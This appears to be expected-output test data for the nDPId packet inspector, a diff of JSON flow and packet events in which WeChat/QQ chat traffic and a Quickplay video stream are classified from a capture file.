{"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"},"http": {"hostname":"hkextshort.weixin.qq.com","url":"http:\/\/hkextshort.weixin.qq.com\/cgi-bin\/micromsg-bin\/mmsnssync","code":0,"content_type":"","user_agent":"MicroMessenger Client"}} +00829{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000050062,"flow_last_seen":1429000050062,"flow_idle_time":7580000,"flow_min_l4_payload_len":540,"flow_max_l4_payload_len":540,"flow_tot_l4_payload_len":540,"flow_avg_l4_payload_len":540,"midstream":1,"thread_ts_msec":1429000050062,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.151.160","src_port":54883,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"},"http": {"hostname":"hkextshort.weixin.qq.com","url":"http:\/\/hkextshort.weixin.qq.com\/cgi-bin\/micromsg-bin\/mmsnssync","code":0,"content_type":"","user_agent":"MicroMessenger Client"}} 01938{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1429000051331,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1152,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":1152,"pkt_l4_len":1116,"thread_ts_msec":1429000051331,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcBHAsp0AArAZOUHgcIygKNqn6AFDLJxWDzlj4STjnUBgIQ33VAAByqbIRKSnXO3n7wDbsfUk8e6VuWplgy2s+dhRInKblJDspkbYpMraIC2G\/R+GUD+2cHzU1WK917CgXy1UuWGNRG3nVdbmkpW6gXyTrK\/GWE44kpRkGnzPXCIHXPX744dGFJMegxO0qTCK1Fo6i3uEpacGLcKMMoyNpcaQHAYLI622xbJ8B36qbIZZWruxvDu7KIDG5e3mPu31z9S2QcHaVE4BE1tKVMaRT4CoWi1PkV85kYTw7+lXQj9CaQqhbKReGPL\/tcLMkyzZwE6IHJUK26PQvKyhEuU6GAQ+r9LcupqVlcd+NUyod+WhKMRAmSJil\/BRUsIdoudcrCIqRJzR5jVUoqyj\/ptMT5SVgA5N26bnxszCob1V6PGoSqrFbXGqUSFChkbSJKFRTCvxPDJYyRcjsMaoU12chr9o101HtsZqTm8Y5QbIAN7B8AVumqqy0fH9lTC67oIzCP4XCUFPOzmsTGixU55n8PiHFsO9k6FHgmL2Qpx9XZ7LZZq6kKLQZ6YEj4wSZ17X4PtdheB86DsQcq8hTQKwZ50xFXAuqOJAfjJ3Fwvpkhy0irBq+moIpZIUyDIXip19wI5TntRdQ6klOXxoMR4h+rkQF9NIWAZsF4N+T7NhEDH0IhJ+7C8yW\/XKrXV2QuHcZeah99tklt\/1RoCV3tlE3iI+9KsShs\/QYEoI2GuydlkjMnZTY8FZqf7NGoRzmtcyCTcSq7ihdZ8emY8+Em76YXV5DqpjEXAEAd6Ihi3wXtxe47OSDIzuYkFbw07vSe8r5pw+O8CvCFNmM+\/R5XtTzDC6jpCkjK2Ks4K8eO1sR7xVxwgkYKLOtWeJvnPFsHRpwPxtVG35fKrArPruPuT5oZOx\/pQJT9cFmcAl3RKKARXXxajyJ2qH50U92ABd9K3dq1HyFHG2aoh8ZR\/WT1vs31Bm0M7ATJhQL2l2m4hoGBonCWxZz758eNTp\/kC\/zRYgzH6m74xpGj038MxNX4to5jr+JtrVTP6loTNL8hf21+Z1vRJ8TKNwrI0CwNIptRF429nB7n+Pl6NrVJTHjMQt5IoQZRVlFDepGzD3fSDZZ4GjFo43mYzPMjWk0+FMIfnOvn6Gn8nXWwKtX1oF2fKKInSceON8GTZBwiFeJbBUg69aGCibPn5BkMxekscJXDNFdCB2xNetElbFYP+YoyUHk8ZsDR\/PLX1ywopxm9Q\/Py6arJrU3L+8wIopRGPUBVivuDfLh0pGSoWdpGKSTKIBICVrgSbSPdIgZjbfO0v4LLFX+kYV8QKziGFA\/WUp+nU5eMYE6UsEvLHeSktqvq0aUc+dVpxaKqVHlN+ect0oR9LY9MKkAeQsdVq1CuWDxS+xrJyD\/Uu+pp1IZey306exBm3ut4YWy7OXTRL0TOwdk6mtjCmzQzJRmtiRCxM7bjXgmi1lSWiwmYs4+DuYZWGKvtZHnnKOVsVmU8qj1T9ly"} 01184{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1429000051366,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":596,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":596,"pkt_l4_len":560,"thread_ts_msec":1429000051366,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAkSlZ0AAPwZ8rgo2qfrLzZeg1mMAUMsBdKl7s0qnUBgAbhITAABQT1NUIGh0dHA6Ly9oa2V4dHNob3J0LndlaXhpbi5xcS5jb20vY2dpLWJpbi9taWNyb21zZy1iaW4vbW1zbnNzeW5jIEhUVFAvMS4xDQpBY2NlcHQ6ICovKg0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCkNvbm5lY3Rpb246IGNsb3NlDQpDb250ZW50LUxlbmd0aDogMjc1DQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbQ0KSG9zdDogaGtleHRzaG9ydC53ZWl4aW4ucXEuY29tDQpVc2VyLUFnZW50OiBNaWNyb01lc3NlbmdlciBDbGllbnQNCg0KjV8mAQBBVSvQfd8CEAIXSGRsPmwM34SDANYBswPsAcTdAQKE1XHhkgwTYJ\/4C3eKbQVsdC1Dk55XBGM8iLIuJNxQ2mKDGCiEu7hKfZxRSGMz97qFq2jItoGcPUyJfVpIIUYedk0uwBKYCKwk1caV589saz0xALfFf\/iYFlFx1AxUdy484YNnqVDF8K+kVH3f2c9yoInZasFWfv137RkUwmCH+br0dsm2pY5PlW8IbHQGBJKkdj6f6t1lujHjoakqif1dkWjRkTjcDfsFtBglw4jP18zIVy+uqXK+1IUwvsPz80+hSVjN5hP25Llmt\/ESe34eB\/LJMU4AkN\/2f0FWCACM2tXWSzYfJGQOBiLS2DO0iM0="} 00582{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1429000052145,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":145,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":145,"pkt_l4_len":109,"thread_ts_msec":1429000052145,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAIFK0UAArQZq68vNl6AKNqn6AFDWY3uzUB\/LAXbFUBgIIl2QAADLSVkFxdhO01jGkqqir\/4Pe\/qItPtTf6ajYud7yQvoMcf18CvkFV3iH59UBVcusMzzLrB7pfuUH4Sme9ekIxa0n3Xkcqj9Zb8GTsGgT4pSgGI1jIGtnmYZvw=="} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":29,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000052217,"flow_last_seen":1429000052217,"flow_idle_time":7580000,"flow_min_l4_payload_len":444,"flow_max_l4_payload_len":444,"flow_tot_l4_payload_len":444,"flow_avg_l4_payload_len":444,"midstream":1,"thread_ts_msec":1429000052217,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52009,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 01051{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1429000052217,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":500,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":500,"pkt_l4_len":464,"thread_ts_msec":1429000052217,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAeRjSUAAPwaHVgo2qfp4HCMoyykAUHABsefLT2i4UBgBySAFAABHRVQgL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvU1RWODBSMTkyL3FwbWV6ei1IYXdrX0RpZ2l0YWxfQ09OVEFHSU9OXzIwNTQwMzNfRkVBVFVSRV9FTkdMSVNIXzJfMF9MVFJUXzIzOTc2ZnBzXzc4MzQxOTIubTJ0X1NUVjgwUjE5Mi0wMDIwLnRzIEhUVFAvMS4xDQpIb3N0OiB2b2Qtc2luZ3RlbGhhd2sucXVpY2twbGF5LmNvbQ0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKExpbnV4OyBBbmRyb2lkIDQuNC40OyBNSSAzVyBCdWlsZC9LVFU4NFApIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIFZlcnNpb24vNC4wIENocm9tZS8zMy4wLjAuMCBNb2JpbGUgU2FmYXJpLzUzNy4zNg0KDQo="} -01147{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000052217,"flow_last_seen":1429000052217,"flow_idle_time":7580000,"flow_min_l4_payload_len":444,"flow_max_l4_payload_len":444,"flow_tot_l4_payload_len":444,"flow_avg_l4_payload_len":444,"midstream":1,"thread_ts_msec":1429000052217,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52009,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"vod-singtelhawk.quickplay.com","url":"vod-singtelhawk.quickplay.com\/seg\/vol1\/s\/Warner\/qpmezzhawkdigitalcontagion2054033featureenglish20ltrt23976fps7834192\/2015-02-02\/STV80R192\/qpmezz-Hawk_Digital_CONTAGION_2054033_FEATURE_ENGLISH_2_0_LTRT_23976fps_7834192.m2t_STV80R192-0020.ts","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 4.4.4; MI 3W Build\/KTU84P) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/33.0.0.0 Mobile Safari\/537.36"}} +01147{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000052217,"flow_last_seen":1429000052217,"flow_idle_time":7580000,"flow_min_l4_payload_len":444,"flow_max_l4_payload_len":444,"flow_tot_l4_payload_len":444,"flow_avg_l4_payload_len":444,"midstream":1,"thread_ts_msec":1429000052217,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52009,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"vod-singtelhawk.quickplay.com","url":"vod-singtelhawk.quickplay.com\/seg\/vol1\/s\/Warner\/qpmezzhawkdigitalcontagion2054033featureenglish20ltrt23976fps7834192\/2015-02-02\/STV80R192\/qpmezz-Hawk_Digital_CONTAGION_2054033_FEATURE_ENGLISH_2_0_LTRT_23976fps_7834192.m2t_STV80R192-0020.ts","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 4.4.4; MI 3W Build\/KTU84P) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/33.0.0.0 Mobile Safari\/537.36"}} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":30,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000052348,"flow_last_seen":1429000052348,"flow_idle_time":7580000,"flow_min_l4_payload_len":324,"flow_max_l4_payload_len":324,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":324,"midstream":1,"thread_ts_msec":1429000052348,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.129.101","src_port":42761,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00891{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1429000052348,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":380,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":380,"pkt_l4_len":344,"thread_ts_msec":1429000052348,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAWw6SUAAPwb+3wo2qfrLzYFlpwkAUDA+6IKRcovGUBgAblluAABQT1NUIGh0dHA6Ly9oa2V4dHNob3J0LndlaXhpbi5xcS5jb20vY2dpLWJpbi9taWNyb21zZy1iaW4vbW1iYXRjaGVtb2ppZG93bmxvYWQgSFRUUC8xLjENCkFjY2VwdDogKi8qDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQ29ubmVjdGlvbjogY2xvc2UNCkNvbnRlbnQtTGVuZ3RoOiA0OQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi9vY3RldC1zdHJlYW0NCkhvc3Q6IGhrZXh0c2hvcnQud2VpeGluLnFxLmNvbQ0KVXNlci1BZ2VudDogTWljcm9NZXNzZW5nZXIgQ2xpZW50DQoNCoZfJgEAQVUr0H3fAhACF0hkbD5sDN+EgwC5BQICxN0BAmqbBe97kd9DUUv3xZ4Sxtk="} -00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":30,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000052348,"flow_last_seen":1429000052348,"flow_idle_time":7580000,"flow_min_l4_payload_len":324,"flow_max_l4_payload_len":324,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":324,"midstream":1,"thread_ts_msec":1429000052348,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.129.101","src_port":42761,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Tencent.QQ","breed":"Fun","category":"Chat"}} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":30,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000052348,"flow_last_seen":1429000052348,"flow_idle_time":7580000,"flow_min_l4_payload_len":324,"flow_max_l4_payload_len":324,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":324,"midstream":1,"thread_ts_msec":1429000052348,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.129.101","src_port":42761,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Tencent.QQ","breed":"Fun","category":"Chat"}} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":31,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000052350,"flow_last_seen":1429000052350,"flow_idle_time":7580000,"flow_min_l4_payload_len":405,"flow_max_l4_payload_len":405,"flow_tot_l4_payload_len":405,"flow_avg_l4_payload_len":405,"midstream":1,"thread_ts_msec":1429000052350,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.151.160","src_port":54885,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 01001{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1429000052350,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":461,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":461,"pkt_l4_len":425,"thread_ts_msec":1429000052350,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAb2qTEAAPwZ4UAo2qfrLzZeg1mUAUE+SeI3XHwqaUBgAbsqdAABQT1NUIGh0dHA6Ly9oa2V4dHNob3J0LndlaXhpbi5xcS5jb20vY2dpLWJpbi9taWNyb21zZy1iaW4vZ2V0Y29udGFjdGxhYmVsbGlzdCBIVFRQLzEuMQ0KQWNjZXB0OiAqLyoNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpDb25uZWN0aW9uOiBjbG9zZQ0KQ29udGVudC1MZW5ndGg6IDEzMA0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi9vY3RldC1zdHJlYW0NCkhvc3Q6IGhrZXh0c2hvcnQud2VpeGluLnFxLmNvbQ0KVXNlci1BZ2VudDogTWljcm9NZXNzZW5nZXIgQ2xpZW50DQoNColfJgEAQVUr0H3fAhACF0hkbD5sDN+EgwD\/BNABUsTdAQKE1XHhkgwTYJ\/4C3eKbQVsdC1Dk55XBGM8iLIuJNxQ2mKDGCiEu7hKfZxRSGMz97qFq2jItoGcPUyJfVpIIUYeQoz6VrtJH00pu+gvbU58lmESj2o4D7TnERbmXXALCqM="} -00839{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000052350,"flow_last_seen":1429000052350,"flow_idle_time":7580000,"flow_min_l4_payload_len":405,"flow_max_l4_payload_len":405,"flow_tot_l4_payload_len":405,"flow_avg_l4_payload_len":405,"midstream":1,"thread_ts_msec":1429000052350,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.151.160","src_port":54885,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"},"http": {"hostname":"hkextshort.weixin.qq.com","url":"http:\/\/hkextshort.weixin.qq.com\/cgi-bin\/micromsg-bin\/getcontactlabellist","code":0,"content_type":"","user_agent":"MicroMessenger Client"}} +00839{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000052350,"flow_last_seen":1429000052350,"flow_idle_time":7580000,"flow_min_l4_payload_len":405,"flow_max_l4_payload_len":405,"flow_tot_l4_payload_len":405,"flow_avg_l4_payload_len":405,"midstream":1,"thread_ts_msec":1429000052350,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.151.160","src_port":54885,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"},"http": {"hostname":"hkextshort.weixin.qq.com","url":"http:\/\/hkextshort.weixin.qq.com\/cgi-bin\/micromsg-bin\/getcontactlabellist","code":0,"content_type":"","user_agent":"MicroMessenger Client"}} 00731{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1429000052688,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":261,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":261,"pkt_l4_len":225,"thread_ts_msec":1429000052688,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAPWIBEAArAZEf8vNgWUKNqn6AFCnCZFyi8YwPunGUBgIIppgAABIVFRQLzEuMSAyMDAgT0sNCkNvbm5lY3Rpb246IGNsb3NlDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbQ0KQ29udGVudC1EaXNwb3NpdGlvbjogYXR0YWNobWVudDsgZmlsZW5hbWU9bWljcm9tc2dyZXNwLmRhdA0KQ29udGVudC1MZW5ndGg6IDQ3DQoNCn5fAAAAAFUr0H3fAhACF0hkbD5sDN+EgwC5BQwMAADES8+zVe2SBL6tUVxA2Vh6"} 00732{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1429000053611,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":261,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":261,"pkt_l4_len":225,"thread_ts_msec":1429000053611,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAPUJYEAArQar6MvNl6AKNqn6AFDWZdcfCppPknoiUBgIIrzYAABIVFRQLzEuMSAyMDAgT0sNCkNvbm5lY3Rpb246IGNsb3NlDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbQ0KQ29udGVudC1EaXNwb3NpdGlvbjogYXR0YWNobWVudDsgZmlsZW5hbWU9bWljcm9tc2dyZXNwLmRhdA0KQ29udGVudC1MZW5ndGg6IDQ3DQoNCn5fAAAAAFUr0H3fAhACF0hkbD5sDN+EgwD\/BAgIAACTADJ0e1hwz8xBqPPud44t"} 02362{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1429000054555,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1456,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":1456,"pkt_l4_len":1420,"thread_ts_msec":1429000054555,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcBaBrnEAArQYNK3gcIygKNqn6AFDLKctRyGZwAbOjUBAIIjnpAAC6eiaRjUv\/RPkOH82F5WosK669TTY41gIXUb5TM31DDCidAN9BA2XuM3HL8T4H8RaooiwzYVX\/NyYQvgJwozgBs+HWQERJo3j\/tFsg+NsbehQ2yqZ0ni5IF772nmOTUjjTqhvSyTYKL8LPX7\/SbJuUeesyVlCo1rcZrFyvobivL2QselZVKbZT9oXnVrTBXz9SgWOBGQjqM+6MYkHQqsKJwKvUzEiyfqsG7Y5ib\/HG3Cr61CWCOUzckjCo4x7\/2FXuS4bbTxyKoEXBeNcTCujBm4BW7TCl6yaZq2WXxGG4hvRF0Be\/m5kDX7D2ritov06P2eBHlozi8poVm+8iR+ps7ttJSDR9cRtIoZ6CzGQuMlpslQH3eGbKiA+TieQa5VKgPmn67A5ZHz6oVTfujJs8WKbjDDZ9Q0iRvNel4W1E1K\/\/zSVXoGcUMXf+jhnQwZpcpi1EdAnR+40BHozU+RTudhZL4Gple7Zf9xhKfQFyWOsUn76k3fkX1zxQlXwkMtX73RmtTyaB3L2pN7AlVM\/\/nWHu7EuLuT9DL9C5g0C9ndUmqL7NBsK0kAZZ78eDPfrNcCw\/ZFw2bNcbUFc\/DZYsLjg+otfm91LhV9Jp43mlKbIVnnDPmIDKMqjiCMwbTaSaZixrFny1uf5O00Y6dqEgtz9Pli4PyDpRhyoCvJu+i4H+d88Uaw2rkO46JoXyB7A5p5OjjhlkqrGyi1CwU0deobjNdyyDdV8jJ\/Pi9n3PsmZZgmuJXbUr3Wj33YeDG\/0Oj+2II0vRU4R2CMhv6eJcxCNdiNxlxN6WMj7SN4Xwx9cQTGloH0v9P+ZbhisAixQQx+c7VnS53a6eMHAGjtfp5Vfl\/a+fbz\/SS6+0wsbw43YigcJZdKwu\/J+7R2Vsvwwp\/\/0VJXCclXCvQKK9ZgSyMjcZXFFdVBYQ9ynX2PKUJbCiQo0ZSacbctiB0eo38ldIKG1HQXiG+IvrS8x51f+MHkxe\/Qz6gFVONzxqGI2AuPK799Gz1u48EzIlwqf+hfJ5+80+67LPm7OKnX\/+Hglw20t2bXScSU\/7a\/No7LXMZaiPPFjItOLkydDIZdblKbD9VzRcriDGIikYRE2vOO7ef0bABx9ekxq7Y6qOz8wz2bfi82kKdO6ZKos8mJ6Z5zMskbhz5TARjuFwb\/y0CNvNRI3ZzaCcWvcSerQm6YI5Qkh9hi+UFoCigmvOa40ltrSAgZJLwEzoigbbL\/Fux90aNws71lhYIk5rLapLHllGTYci4NeZq+lysN0NJeGSVgJjhywSjEcv98KS01SOoGP+L8hkrHHDndozayAIZx7KNatPdBhHierZx9hk7YaR2QyAaOf\/KGZ26mtXJD+fZ9qzzRf7VPOJIXRan6Mvh2X5ksvc+d2E+xpW4ZS3heqwr3GFyseSzu+SItPTkyOePTh5SBKlnurq4GBXzKzTiVp1gCObUjjb361kLXFDG8pv8RFHz9T71D1Nc2wSTzFugnvV1UNFiSfCUv5Hf3vreasQSxEc5M2HufON7Ls2Sq1av0HxiKW3cr3g1hTf6isQpBvLi2kzfVTuUfjZ4NfuituEBPk76dM0NGhwCE37DhDWyEA0CskC\/3LGpzpkwJVXZJneb4tZ6ZUUp9Tq8jwnKJrc9Xm0\/K+NOqhD9cfXeA0wPmIBqb\/50HOtK0ivaxJQrriFNfYzXGvwDWExqj3032B+UnoRZ9sdl+HDci1tJl2ZYTWQ\/jnW4QU+eyZsftpA1fidaKNXFUm98r6LCSgwEpKQko1ga3+vGDjVtQbFJqqZZSUhMiGE7JxSiWQR6m1VFOyrIP\/NGSlhQwEVU0AVlSc0flRUDOO1ef3Q8CCp+aj8TUh3wwIIfQUflA=="} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":35,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000054595,"flow_last_seen":1429000054595,"flow_idle_time":7580000,"flow_min_l4_payload_len":560,"flow_max_l4_payload_len":560,"flow_tot_l4_payload_len":560,"flow_avg_l4_payload_len":560,"midstream":1,"thread_ts_msec":1429000054595,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.129.101","src_port":42762,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 01212{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1429000054595,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":616,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":616,"pkt_l4_len":580,"thread_ts_msec":1429000054595,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAljROkAAPwZnAgo2qfrLzYFlpwoAUAw7AlWKyQifUBgAbo2ZAABQT1NUIGh0dHA6Ly9oa2V4dHNob3J0LndlaXhpbi5xcS5jb20vY2dpLWJpbi9taWNyb21zZy1iaW4vYW5kcm9pZGdjbXJlZyBIVFRQLzEuMQ0KQWNjZXB0OiAqLyoNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpDb25uZWN0aW9uOiBjbG9zZQ0KQ29udGVudC1MZW5ndGg6IDI5MQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi9vY3RldC1zdHJlYW0NCkhvc3Q6IGhrZXh0c2hvcnQud2VpeGluLnFxLmNvbQ0KVXNlci1BZ2VudDogTWljcm9NZXNzZW5nZXIgQ2xpZW50DQoNCo1fJgEAQVUr0H3fAhACF0hkbD5sDN+EgwDvBPUC9wHE3QEChNVx4ZIME2Cf+At3im0FbHQtQ5OeVwRjPIiyLiTcUNpigxgohLu4Sn2cUUhjM\/e6hatoyLaBnD1MiX1aSCFGHqc7sd1LbQ4Ji50\/nmut+cRtfu64v\/XpBgMs3P9k27B87PKWuZeRn0c7PoUNWA2a8JliIiEG\/iNlGYYh7Jh9YEWG\/gDJeOxQbfTuL3jKYttVpQbSW5W7M23rsRNXzMxlPjm7V+eiXogw4ZTrI0SYQBetGJTy4I9tf1xmHMyE6HsFYIlHFXzsGgJQf7uh78Qo0Kz+t0syWOECVQvp3s423G3nllPk9jmdcOLrj5HgsV0zUjYpYNBzzWvoRGUwiRoLkw=="} -00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":35,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000054595,"flow_last_seen":1429000054595,"flow_idle_time":7580000,"flow_min_l4_payload_len":560,"flow_max_l4_payload_len":560,"flow_tot_l4_payload_len":560,"flow_avg_l4_payload_len":560,"midstream":1,"thread_ts_msec":1429000054595,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.129.101","src_port":42762,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Tencent.QQ","breed":"Fun","category":"Chat"}} 